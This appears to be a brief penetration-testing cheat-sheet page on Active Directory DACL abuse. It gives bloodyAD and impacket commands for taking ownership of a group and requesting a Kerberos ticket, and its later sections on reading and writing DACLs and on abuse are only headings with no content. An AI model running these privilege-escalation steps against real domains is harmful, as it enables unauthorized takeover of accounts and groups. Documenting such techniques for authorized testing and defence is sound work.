DACL (Discretionary Access Control List) Attack
Set Ownership of Group
# Install if it does not exist on your machine.
pipx install bloodyAD
bloodyAD --host dc.example.local -d example.local -u <username> -p <password> set owner <group-name> <username>Add Rights
1. Ask TGT for Kerberos Authentication
# Sync datetime with target system
sudo ntpdate <target-ip>
# or
sudo rdate -n <target-ip>
impacket-getTGT -dc-ip <target-ip> example.local/username:password2. Read DACL
3. Write DACL
Abuse
Method 1. Add User to Group → Get TGT → Get NT Hash
Method 2. Set Password of Another User
References
Last updated